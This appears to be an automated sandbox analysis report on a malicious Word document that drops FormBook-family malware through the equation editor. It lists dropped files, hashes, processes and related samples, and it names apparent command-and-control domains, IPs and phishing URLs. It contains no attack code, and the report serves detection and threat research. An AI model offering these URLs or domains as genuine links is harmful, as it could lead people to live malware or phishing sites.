Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 67949.2042416187 for current running targets taking high CPU consumption Override analysis time to 135898.408483237 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, PID 3000 because it is empty
Execution Graph export aborted for target EQNEDT32.EXE, PID 1408 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:31:57	API Interceptor	259x Sleep call for process: EQNEDT32.EXE modified
11:32:31	API Interceptor	1769x Sleep call for process: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe modified
11:32:36	API Interceptor	7562016x Sleep call for process: finger.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.185.225.30	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.zopter.dev/nrup/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.zopter.dev/niik/
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.zopter.dev/nrup/
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.zopter.dev/nrup/?jH1=cn4P66&Gv=i3HAzC/U9OJxIpd/aFIq3qkupSD6ANqS67PrGCHTQB0skmoYQlANd9WUV9Q5JBr9nmo5zLmqMM+UGTcdqDZY+Yxm5gk3CqyBLmnKQbUv4BZidneksocFhz0=
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.zopter.dev/nrup/
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.zopter.dev/nrup/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.zopter.dev/niik/?PRT4=zcjOiuWgYtGROYOkP08dUtWcsPLT6RnqZ93tojumozArMx+r4bzJQF3VuHrG5RwALo0maMAEpkR/OBL9Act/oyvzVTML9JM8B+1TBRiJjoqBfJ7jlT+caL8=&wp=Y4bXb
	Arrival Notice.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.zopter.dev/niik/
162.240.81.18	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.aprovapapafox.com/aleu/
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.aprovapapafox.com/aleu/
	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.agoraeubebo.com/nrup/
	INQ No. HDPE-16-GM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.aprovapapafox.com/aleu/
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tavernadoheroi.store/3g97/
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	www.aprovapapafox.com/aleu/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.agoraeubebo.com/niik/
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.agoraeubebo.com/nrup/
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.agoraeubebo.com/nrup/?jH1=cn4P66&Gv=dWrD1PFadq7V5KkT4LFo0o0ceK+Fdoxu4bG3e9Abb7XIEj/TR5WidBvHl5Crj+jPOsSaqiQVqCgntzF+MJy+srxryBjk62On/DUjB7mkf9HqIW/2fSnYTpA=
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.agoraeubebo.com/nrup/
45.33.6.223	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
	APR PAYROLL.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
	tee030.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
	Invoice-4536PND.pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
	RFQ__Quotation_Pvq-100-23-258.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
	Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.doc	Get hash	malicious	FormBook, GuLoader	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
	BANK_MT103_PAYMENT.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	RFQ-LOTUS 2024.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	DHL Overdue Account Notice - 1606622076.PDF.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
www.gudvain.top	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	203.161.62.199
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	203.161.62.199
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	203.161.62.199
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	203.161.62.199
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	203.161.62.199
www.deniztemiz.fun	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	46.28.105.2
	BoTl06PDGl.exe	Get hash	malicious	FormBook	Browse	46.28.105.2
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.105.2
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.105.2
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.105.2
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.105.2
www.rtp7winbet.one	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.145.66
	IMAGE_0010.exe	Get hash	malicious	FormBook	Browse	104.21.39.119
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.39.119
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.39.119
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.145.66
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.39.119

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://doc-54.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	192.185.84.89
	https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/6633a7cf97fd9ead35f66a32/6633a7e84f05433e2083ee33?signature=9c11385e1a90a23ec61856fcd0c52fab8072fde25e41de83f9f29f011029796b	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse	162.241.100.151
	http://olp8111as000.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.241.61.249
	https://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/19b1eb27-fde7-9da8-e5d8-66929bfd35ed/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	http://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/19b1eb27-fde7-9da8-e5d8-66929bfd35ed	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/6633b37140500191ff330217/6633b38e7f943a5ca8ce50d8?signature=25a053a508ed47c3826573725f992cb49ebb8278adb544aaccefb76e35c21e1d	Get hash	malicious	HTMLPhisher	Browse	192.185.31.174
	https://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/a24f6496-e09a-dc58-3350-a3280e84bed8/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://www.jobserve.com/gb/en/Redirect/DirectoryUrl.jsrs?id=D678A952F7&L=https://freshpastacup.com/ximxi/MD5/BASE64EMAIL	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://gamma.app/docs/Untitled-9umekc4egyknsob	Get hash	malicious	HTMLPhisher	Browse	192.185.84.91
UNIFIEDLAYER-AS-1US	https://doc-54.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	192.185.84.89
	https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/6633a7cf97fd9ead35f66a32/6633a7e84f05433e2083ee33?signature=9c11385e1a90a23ec61856fcd0c52fab8072fde25e41de83f9f29f011029796b	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse	162.241.100.151
	http://olp8111as000.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.241.61.249
	https://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/19b1eb27-fde7-9da8-e5d8-66929bfd35ed/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	http://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/19b1eb27-fde7-9da8-e5d8-66929bfd35ed	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/6633b37140500191ff330217/6633b38e7f943a5ca8ce50d8?signature=25a053a508ed47c3826573725f992cb49ebb8278adb544aaccefb76e35c21e1d	Get hash	malicious	HTMLPhisher	Browse	192.185.31.174
	https://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/a24f6496-e09a-dc58-3350-a3280e84bed8/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.185.114.60
	https://www.jobserve.com/gb/en/Redirect/DirectoryUrl.jsrs?id=D678A952F7&L=https://freshpastacup.com/ximxi/MD5/BASE64EMAIL	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://gamma.app/docs/Untitled-9umekc4egyknsob	Get hash	malicious	HTMLPhisher	Browse	192.185.84.91
SEDO-ASDE	Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	RFQ-LOTUS 2024.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	Udskriftsskemaernes.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
HOMEPL-ASPL	ihZyXLPYmm.elf	Get hash	malicious	ConnectBack	Browse	46.41.139.162
	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	46.242.239.47
	97zyqEu4Nh.elf	Get hash	malicious	Moobot	Browse	212.85.111.22
	bin.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.242.239.47
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.242.239.47
	1No1dv4uLe.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.242.239.47
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.242.239.47
	1208819601.exe	Get hash	malicious	Unknown	Browse	79.96.122.75
	qQVtMCLrxN.elf	Get hash	malicious	Mirai	Browse	46.242.191.223
	qZSULDXKfu.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.242.246.188
LINODE-APLinodeLLCUS	http://www.paviarealestate.com	Get hash	malicious	HTMLPhisher	Browse	66.228.43.205
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	45.33.6.223
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	45.33.6.223
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	45.33.97.245
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	45.33.97.245
	https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	45.56.122.121
	https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	45.56.122.121
	https://cushwake.radiacellar.com/	Get hash	malicious	HTMLPhisher	Browse	104.237.130.23
	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	139.162.5.234
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	45.33.6.223

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	172.67.175.222
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	172.67.175.222
	ls3wzs2VQr.rtf	Get hash	malicious	Unknown	Browse	172.67.175.222
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.175.222
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	172.67.175.222
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	172.67.175.222
	Account report (1).docx	Get hash	malicious	Unknown	Browse	172.67.175.222
	Account report (1).docx	Get hash	malicious	Unknown	Browse	172.67.175.222
	documento.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.175.222
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.175.222

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\sqlite3.dll	Invoices.xls	Get hash	malicious	FormBook, GuLoader	Browse
	SISF23208BP_1.xls	Get hash	malicious	Unknown	Browse
	belge_24.3.2023.xls	Get hash	malicious	FormBook	Browse
	ORDERR.xls	Get hash	malicious	FormBook	Browse
	purchaseOrder_list_(P.O_R477304).xls	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228800
Entropy (8bit):	7.11399332916018
Encrypted:	false
SSDEEP:	24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8aUDjzCmdlsy0g2gV:DTvC/MTQYxsWR7aUDqmd47
MD5:	3E42573B12F2ADBEFD9E6540BB9C56FD
SHA1:	FE13DE9D389BBE2C9E42A286D933958180254421
SHA-256:	80D4532A06DAB066B1DAE4346148175A5CE3555B509D795EB40CEB4E03C411D0
SHA-512:	9121BF098EB9AF2BDD377534B8F998AB6ACF0253ED2D2B2D951EFF8AD46A36D09F2C2357656E975615D10392A7EB17C77F4FF7D9CFC37AAFFBC4E5E78DC309F1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...C.3f..........".................w.............@.......................... ............@...@.......@.....................d...\|....@..DT.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...DT...@...V..................@..@.reloc...u.......v...J..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3240000[1].zip

Download File

Process:	C:\Windows\SysWOW64\finger.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	454843
Entropy (8bit):	7.998387778913046
Encrypted:	true
SSDEEP:	12288:ilOoZN01vhTrL1i+mlcCM0PVhM+o+iVUe4J:LosvhXBi+mlcCM0t65xaJ
MD5:	D71848944418C67F6EB230682F9A969A
SHA1:	11D37A0ECCBAF9995C6B236FF1A99D174A2566BD
SHA-256:	EFFF0464180FCB34EC33E7835086EA58ADC84BC3F0B08A7323EF1D58B258E59E
SHA-512:	7BAEF376FB5F87E43124F79F81FE45567B7926BE277A05ABBBFE74BDBBE8DC49C238999E432FB4C457DFF23CA78915D2A899BDDE9A2EE79B77C655C17EBE706D
Malicious:	true
Reputation:	low
Preview:	PK...........L..h. ...........sqlite3.defUT.....[..[ux.........d.....Ks.6....7.;.....I{.MCI..c.T..z...>v....d... ...~..._?.........I.]x...=\|..&h.7......<..-..&.t..".-;..\|.p....V.<..I.N.2sO^..l5aV........A)NNa...l.F..\|<Sj....n..C.-...k.Z......`M.;...8.7...E.....4'...~......w..B..: B/.0..`.z..,..\c'V/..M..@...#I.....R...Xa}. ..U..<..9..~>...W..,.F.4#e......V.`..Beo...G&.-3V.r<...yx\5vE..f.D"l0r.-.L.9..1o..Ra.....?.....8.x...Jor.b4{Z./U....t....x.bY.u[..h.;.W.k...f.....1..\../b.....Y"..B...Y\|..Br.O........V.L...c..y.CM.O..!0........X..h....pUg.bV&.noD.z..............(...b2/..v.+,.........)&.Q.j..g]c........zN....``...%W(4o1......f.............,o=e.x.,..p..u`.d.UV.9.9.W.M.1.c...~./...8.RfiDR.s.N.c.h.E...FQ..t....U.QW...#....d..F.V.-.$.t,r...+......(..a..R...1P....vZ...Z.l. t?._Z8..G..DT.....(.C.."._..$.../..PIz.R..g..al.D...PL<c.....U!....3Vycfr...m^*.Mg.~am[^..3k..fm.a.!3..+\|}...........o8].o.......F.~..).j.....%....}...A1..y.u..Ws........M.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{914B2F69-82DC-46CC-8DD8-1FA442E30CC1}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0BB92122-B0F3-4D68-A452-FB6259A56894}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849453
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1MzB
MD5:	80651C02D25D4AE194AC64E80126355D
SHA1:	2E178DB85AEB23C8D78E21A4F3EB1F74520E7BDC
SHA-256:	C3BE1B01507C3840151F80349DE531F1DFC31A8398688D515749EB34F39EC277
SHA-512:	4F5FC0324039DFD678F09EB697BE61950C0FD372832B94AFDDF8665574D356EEEC10CE778E2F619BB084A49D2B15798D4153656F74D956C1F7BE9C0EFFDBAF02
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7968B847-E29D-41C0-ACB8-AE84D1770DC9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C3CBF28E-459B-48B7-84CD-B236D108BA2C}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	175104
Entropy (8bit):	3.4122799371616614
Encrypted:	false
SSDEEP:	3072:/yemryemryemryemryemryemryemryemryemryemE5:/yemryemryemryemryemryemryemryeB
MD5:	C62CE4C773F8FE6387B6F6BF34484F67
SHA1:	CA8EA22E34CFDDA8E7EC28F9A30FEC702C8580E2
SHA-256:	1D8C974E4B2D652B634F12A75DD42166FC9A4CD19C8F367A4368D46DE6BC9724
SHA-512:	9EC9CAC06471659989A1CB27391D8B75EE29D07154E1FEE663190C89D67AEAA141E0C083F4807192FFD693854CA32FE8B2B9B2743B56E2F36BBE935A272ADC74
Malicious:	false
Preview:	9.1.0.7.1.3.8.6.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Temp\-e04230_

Download File

Process:	C:\Windows\SysWOW64\finger.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
